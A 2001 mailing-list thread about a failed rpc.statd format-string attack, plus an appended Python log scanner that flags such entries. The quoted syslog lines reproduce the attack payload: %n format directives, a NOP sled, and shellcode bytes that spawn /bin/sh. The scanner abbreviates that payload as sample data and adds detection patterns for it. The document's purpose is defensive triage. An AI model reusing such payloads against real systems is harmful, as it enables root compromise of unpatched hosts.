Thanks for this explanation. I got hit with the exact same exploit this evening. I compared my entire /etc structure to a known-good one from almost a month ago and everything checks out. I'm taking your advice and shutting down this service when not using it until I can secure it properly.

Thanks,
jc
Thusly Thwacked By Jeremy Gaddis:

> Someone attempted to run the rpc.statd buffer overflow on
> you, but it appears to have failed. The reason you see
> "/bin/sh" in the log entry is because that's part of the
> shellcode of the exploit. The exploit, when successful,
> executes /bin/sh on your machine and leaves the attacker
> sitting at a root shell prompt.
>
> As someone else stated, disable the rpc.* services if you
> don't need them. If you do, they should be firewalled off
> and only accept packets from machines they need to "converse"
> with.
>
> j.
>
> --
> Jeremy L. Gaddis <[EMAIL PROTECTED]>
>
> -----Original Message-----
> From: Lukas Eppler [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, July 11, 2001 5:42 AM
> To: [email protected]
> Subject: was I cracked? (rpc.statd, new version)
>
>
> I have the following entries in /var/log/messages:
>
> Jul 9 01:21:03 blue -- MARK --
> Jul 9 01:21:11 blue
> Jul 9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z
> <F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x
> %n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220
> Jul 9 01:21:11 blue
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>
> \200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
> Jul 9 01:41:03 blue -- MARK --
>
> I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long
> known exploit fixed. I can't find modified binaries or any strange
> behaviour... was this a defeated attack? The second line says /bin/sh
> somewhere which makes me a bit concerned... Was I cracked?
>
> Lukas
>

--
Jeff Coppock
Nortel Networks            Systems Engineer
http://nortelnetworks.com  Major Accts.
Santa Clara, CA
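As an added defender-side example (not code from anyone in this thread): a small Python scan that picks the rpc.statd gethostbyname entries out of a syslog file and flags the ones whose "hostname" argument carries format-string directives, a run of octal \220 (0x90 NOP) escapes, escaped high bytes or shell-path fragments, as in the log quoted above. It groups records by timestamp and host because the daemon split the overlong name across several records; the sample log is constructed and abbreviated.

```python
import re
from collections import OrderedDict

# Constructed sample modelled on the /var/log/messages excerpt quoted in the thread;
# the NOP sled and shellcode are abbreviated, and the last entry is a benign lookup failure.
SAMPLE_LOG = r"""Jul  9 01:21:03 blue -- MARK --
Jul  9 01:21:11 blue
Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for ^X<F7><FF><BF>^X<F7><FF><BF>%8x%8x%8x%8x%236x%n%137x%n\220\220\220\220\220\220\220\220\220\220
Jul  9 01:21:11 blue <C7>^F/bin<C7>F^D/sh
Jul  9 01:41:03 blue -- MARK --
Jul  9 02:05:17 blue /sbin/rpc.statd[166]: gethostbyname error for nfs-client.example.invalid
"""

# Classic syslog prefix "Mon dd hh:mm:ss host body"; the body may be empty, because the
# daemon logged the overlong name across several records, one of them blank.
SYSLOG_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) ?(?P<body>.*)$")
STATD_MARKER = "gethostbyname error for "

# Things a real hostname never contains, labelled by what each one suggests.
INDICATORS = [
    ("format-string %n write", re.compile(r"%n")),
    ("padded %x directives", re.compile(r"(%\d*x){4,}")),
    ("NOP sled (run of 0x90)", re.compile(r"(\\220){8,}")),
    ("escaped high bytes", re.compile(r"(<[0-9A-F]{2}>){3,}")),
    ("shell path fragment", re.compile(r"/bin|/sh")),
]


def group_events(lines):
    """Group syslog records by (timestamp, host), preserving first-seen order."""
    events = OrderedDict()
    for line in lines:
        m = SYSLOG_RE.match(line)
        if m:
            events.setdefault((m.group("ts"), m.group("host")), []).append(m.group("body"))
    return events


def scan_statd(log_text):
    """Return (timestamp, host, indicators) for each rpc.statd lookup whose argument looks hostile."""
    findings = []
    for (ts, host), bodies in group_events(log_text.splitlines()).items():
        text = "".join(bodies)          # rejoin the split records of one event
        idx = text.find(STATD_MARKER)
        if "rpc.statd" not in text or idx < 0:
            continue
        name = text[idx + len(STATD_MARKER):]   # only the "hostname" the daemon tried to resolve
        hits = [label for label, pattern in INDICATORS if pattern.search(name)]
        if hits:
            findings.append((ts, host, hits))
    return findings
```

Calling `scan_statd(SAMPLE_LOG)` flags the 01:21:11 event with all five indicators and stays silent on the benign lookup failure; point it at a real /var/log/messages by passing the file's contents.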

